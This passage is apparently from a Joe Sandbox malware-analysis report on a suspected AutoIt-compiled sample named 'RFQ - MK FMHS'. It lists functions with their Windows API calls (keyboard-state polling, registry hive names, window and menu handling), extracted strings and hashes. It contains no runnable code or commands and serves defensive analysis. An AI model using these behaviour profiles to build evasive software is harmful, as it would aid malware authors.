                    • Instruction ID: 6b7aae980be20341d69732b85561ec4b4f491e330966490a6c2b36c0fd9bae7e
                    • Opcode Fuzzy Hash: fc8c86c4d76672416d1cc2f9d7cf917b3be4d316228278bbc2625fae06898119
                    • Instruction Fuzzy Hash: 72518E72900209BACF15EBE0DD86EEEB7B9EF04300F245166F509721A1EB316F59DB61
                    Function 00E76BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E90B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E76C6C,?,00008000), ref: 00E90BB7
                      • Part of subcall function 00E748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E748A1,?,?,00E737C0,?), ref: 00E748CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E76D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E76E5A
                      • Part of subcall function 00E759CD: _wcscpy.LIBCMT ref: 00E75A05
                      • Part of subcall function 00E9387D: _iswctype.LIBCMT ref: 00E93885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 0bf905d874672a461a1ef353d63c24a19ec6bc638fdc035b4c672b4639d3f13e
                    • Instruction ID: 24a56b0d90f09518db61982938696e673995b8de745dfaa3a2bfa91bdd54e8ae
                    • Opcode Fuzzy Hash: 0bf905d874672a461a1ef353d63c24a19ec6bc638fdc035b4c672b4639d3f13e
                    • Instruction Fuzzy Hash: CA02AF311083419FC724EF24C881AAFBBE5FF89354F04991DF49AA72A1DB30E949CB52
                    Function 00E745DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E745F9
                    • GetMenuItemCount.USER32(00F36890), ref: 00EAD7CD
                    • GetMenuItemCount.USER32(00F36890), ref: 00EAD87D
                    • GetCursorPos.USER32(?), ref: 00EAD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 00EAD8CA
                    • TrackPopupMenuEx.USER32(00F36890,00000000,?,00000000,00000000,00000000), ref: 00EAD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EAD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
                    • Instruction ID: b0f775b47ad1a7b21c2d8e58b8b1b06c3619cdd2eecf029a150d509ea95a0046
                    • Opcode Fuzzy Hash: 09403a2329ae8ef48adbd96fe04c0b5cb5114202a49eea9283c7c98c0b9b3cd7
                    • Instruction Fuzzy Hash: A9712A70604205BFEB248F64DC45FAABF64FF4A368F105216F529BA1E0C7B1AC10DB94
                    Function 00EF10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
                    • Instruction ID: 16ea6aa0ede1977d9d8b1b1b575009231c51d04411ae5aeb7095a92393be959d
                    • Opcode Fuzzy Hash: d17e2ebf7175dd5df40625e62b3857379d72685d8c34c5e46e620581f9fc479c
                    • Instruction Fuzzy Hash: E6419A3010425ECFDF10EF94E891AFA3364AF11304F416494FE917B292DB30A95ADBA0
                    Function 00ED5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • Part of subcall function 00E77A84: _memmove.LIBCMT ref: 00E77B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00ED55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00ED55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00ED55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00ED560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00ED561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
                    • Instruction ID: 24e413e796f57aa4aa9c3344ab684e2ed736a3ac97d16271acb700b1dd00ea0e
                    • Opcode Fuzzy Hash: 3cad116b9e7eec79e976e8e16596e146b9c381f3439089f12a7dddcec9b64422
                    • Instruction Fuzzy Hash: B81104219501697AE720F661EC4ADFFBBBCEF92B00F40142AB854B20C1EEA18D05C5A2
                    Function 00ED48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: be44acf3dc7b2a050111e4d1b91a8317e974c4f998c0c0b784968981692ece7e
                    • Instruction ID: c5888af7c9095394db142b3c2c610aa8505c26c6427cb012b3d42733c7e0307f
                    • Opcode Fuzzy Hash: be44acf3dc7b2a050111e4d1b91a8317e974c4f998c0c0b784968981692ece7e
                    • Instruction Fuzzy Hash: 7011F371904116AFCF24AB619C46EEA77ECDF80710F0411B6F504B2191EF719A868651
                    Function 00ED5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 00ED521C
                      • Part of subcall function 00E90719: timeGetTime.WINMM(?,75C0B400,00E80FF9), ref: 00E9071D
                    • Sleep.KERNEL32(0000000A), ref: 00ED5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00ED526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00ED528E
                    • SetActiveWindow.USER32 ref: 00ED52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ED52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00ED52DA
                    • Sleep.KERNEL32(000000FA), ref: 00ED52E5
                    • IsWindow.USER32 ref: 00ED52F1
                    • EndDialog.USER32(00000000), ref: 00ED5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
                    • Instruction ID: 0aa31bcd0c515c889be1829e400947ffb2890eb82ddec2a89ccf9d8f64c656ba
                    • Opcode Fuzzy Hash: ec7b2ddb01e9375d11bae903c1ace5a3b31c64d11a269b24b4e097878152e36d
                    • Instruction Fuzzy Hash: 9C21C9B1104708AFEB146F71EC89A363B6AEF84357F042425F401F13B5DB619D09E761
                    Function 00EDD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • CoInitialize.OLE32(00000000), ref: 00EDD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EDD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 00EDD8FC
                    • CoCreateInstance.OLE32(00F02D7C,00000000,00000001,00F2A89C,?), ref: 00EDD948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EDD9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 00EDDA0F
                    • _memset.LIBCMT ref: 00EDDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 00EDDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EDDAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 00EDDAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EDDAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 00EDDAEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: 779de2154666006b974a60577237670b980299bc11ee2c0f5f3ac5d3de905d6b
                    • Instruction ID: dfb4d3df3c6db71cd4309e549573fc65cb780ade25403f9ee9d37542e295f5c0
                    • Opcode Fuzzy Hash: 779de2154666006b974a60577237670b980299bc11ee2c0f5f3ac5d3de905d6b
                    • Instruction Fuzzy Hash: 0CB1FA75A00119AFDB14DFA4C888DAEBBF9EF88314B049469F509EB351DB31ED46CB50
                    Function 00ED052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00ED05A7
                    • SetKeyboardState.USER32(?), ref: 00ED0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 00ED0632
                    • GetKeyState.USER32(000000A0), ref: 00ED0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 00ED0678
                    • GetKeyState.USER32(000000A1), ref: 00ED0689
                    • GetAsyncKeyState.USER32(00000011), ref: 00ED06B5
                    • GetKeyState.USER32(00000011), ref: 00ED06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 00ED06EC
                    • GetKeyState.USER32(00000012), ref: 00ED06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00ED0723
                    • GetKeyState.USER32(0000005B), ref: 00ED0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
                    • Instruction ID: 39eb21658ef583fc0fd9c676694148165ffc8466988e39c46f21e0843f586827
                    • Opcode Fuzzy Hash: f1db4a0fb1b2ac853075531a311a69ba9712b7be29f5f4da9ab3b3eac4d6ccdc
                    • Instruction Fuzzy Hash: 44512960A0478429FB34EBB094147EAAFF4DF01384F0C559BC9C27A7C2DA64DA4DCB51
                    Function 00ECC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 00ECC746
                    • GetWindowRect.USER32(00000000,?), ref: 00ECC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ECC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 00ECC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 00ECC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ECC827
                    • GetDlgItem.USER32(?,000003E9), ref: 00ECC835
                    • GetWindowRect.USER32(00000000,?), ref: 00ECC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ECC889
                    • GetDlgItem.USER32(?,000003EA), ref: 00ECC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ECC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00ECC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
                    • Instruction ID: 3d988189d4510a04b39eccb62ac5fcfc28f1a42ce7e9bbe6a15b54e014cf5571
                    • Opcode Fuzzy Hash: bfaffc74c244402e9b9c8a7906fab5d455f2c4c241ea79165cfd169b8e467d11
                    • Instruction Fuzzy Hash: 03514E71B00205AFDB18CF69DD89EAEBBB6EF88710F14812DF519E6290DB71A944CB50
                    Function 00E7201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E720D3
                    • KillTimer.USER32(-00000001,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00E7216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00EABEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E716CB,00000000,?,?,00E71AE2,?,?), ref: 00EABF5A
                    • DeleteObject.GDI32(00000000), ref: 00EABF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
                    • Instruction ID: 1e7962d6ea53ebf622661574d2dd559627c79350632d9db115d9a40a120d11b3
                    • Opcode Fuzzy Hash: da03f96e6af86fd8f24861cee047b14ddc8359a13aecc41124f64e3a0d83fa30
                    • Instruction Fuzzy Hash: E061C034201604EFCB359F15CC48B25B7F2FF49329F54E52CE246AA5A1C771A890EF60
                    Function 00E721A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E725DB: GetWindowLongW.USER32(?,000000EB), ref: 00E725EC
                    • GetSysColor.USER32(0000000F), ref: 00E721D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
                    • Instruction ID: dd75b999184dc3a6e4fee37c67cb8752e4311262d20a7e9ce21371f92e824f77
                    • Opcode Fuzzy Hash: 06bf99c694146f6bb56fe6cfc15569979f9d3360fd796db73679d57de23e1c23
                    • Instruction Fuzzy Hash: E941B431101180AFDB215F68EC88BB937A5EF46335F249269FE69AA1F3C7318D42DB11
                    Function 00EDAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,00EFF910), ref: 00EDAB76
                    • GetDriveTypeW.KERNEL32(00000061,00F2A620,00000061), ref: 00EDAC40
                    • _wcscpy.LIBCMT ref: 00EDAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
                    • Instruction ID: 929572990f28a11899f83c87fcd3d22fb6533c6578b2c2fabb626e6874dda639
                    • Opcode Fuzzy Hash: fed1e5924f548145ba46d6bebac1359be8a372bf717e286dbf1599131271d6d6
                    • Instruction Fuzzy Hash: 7451A1301183019FC710EF14C881AAEB7E5EF84314F58A82EF496772A2DB31DE4ACA53
                    Function 00E79997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 0f3e20c4df0172646b1cd263a3d7c2fe417eda9c0cae42486854bb98ab24d9be
                    • Instruction ID: 24f6ba366f84cba773d11d660b35f7d624e9f7e34d93e6d6b4474dc6cd01ad40
                    • Opcode Fuzzy Hash: 0f3e20c4df0172646b1cd263a3d7c2fe417eda9c0cae42486854bb98ab24d9be
                    • Instruction Fuzzy Hash: 3141E571604605AFEF24EBB4DC41E7673E4EF89304F20986EE64DFA292EA31E941D711
                    Function 00EF73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00EF73D9
                    • CreateMenu.USER32 ref: 00EF73F4
                    • SetMenu.USER32(?,00000000), ref: 00EF7403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7490
                    • IsMenu.USER32(?), ref: 00EF74A6
                    • CreatePopupMenu.USER32 ref: 00EF74B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF74DD
                    • DrawMenuBar.USER32 ref: 00EF74E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
                    • Instruction ID: 7570da1f70c66f49205a3063b333cf92ad25c08087a8b9315c67ccf737f7ac64
                    • Opcode Fuzzy Hash: bdac3081f2c5128d7f12bcd6195238f35adc59922e966bf85b1617949160f569
                    • Instruction Fuzzy Hash: 04415875A00209EFDB20DF65D884AEABBF5FF49315F144029EA65A7360D730AD14CB50
                    Function 00EF772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF77CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 00EF77D4
